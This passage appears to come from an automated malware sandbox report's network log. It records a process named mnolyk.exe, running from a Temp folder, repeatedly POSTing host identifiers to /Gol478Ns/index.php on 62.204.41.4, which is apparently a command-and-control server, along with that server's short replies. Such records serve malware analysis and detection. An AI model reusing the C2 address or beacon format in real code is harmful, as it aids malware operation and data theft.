                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:45.431293964 CET413INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        213192.168.2.54990362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:45.622795105 CET414OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:45.688411951 CET414INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        214192.168.2.54990462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:45.863997936 CET415OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:45.929059982 CET415INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        215192.168.2.54990562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:46.099036932 CET416OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:46.166430950 CET416INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        216192.168.2.54990662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:46.332969904 CET417OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:46.397893906 CET417INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        217192.168.2.54990762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:46.566674948 CET418OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:46.630750895 CET418INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        218192.168.2.54990862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:46.800738096 CET419OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:46.871973991 CET419INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        219192.168.2.54990962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:47.051764965 CET420OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:47.122370005 CET420INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        22192.168.2.54971262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:34.380434036 CET222OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:34.447359085 CET223INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        220192.168.2.54991062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:47.301538944 CET421OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:47.367959976 CET421INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        221192.168.2.54991162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:47.534707069 CET422OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:47.599071980 CET422INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        222192.168.2.54991262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:47.771913052 CET423OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:47.835026026 CET423INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        223192.168.2.54991362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:48.004987955 CET424OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:48.071654081 CET424INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        224192.168.2.54991462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:48.241764069 CET425OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:48.306983948 CET425INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        225192.168.2.54991562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:48.482167006 CET426OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:48.547434092 CET426INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        226192.168.2.54991662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:48.720590115 CET427OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:48.785530090 CET427INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        227192.168.2.54991762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:48.955073118 CET428OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.018578053 CET428INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        228192.168.2.54991862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:49.195230007 CET429OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.261090040 CET429INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        229192.168.2.54991962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:49.446973085 CET430OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:49.513588905 CET430INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        23192.168.2.54971362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:34.634243011 CET223OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:34.698781967 CET224INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        230192.168.2.54992062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:49.692974091 CET431OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
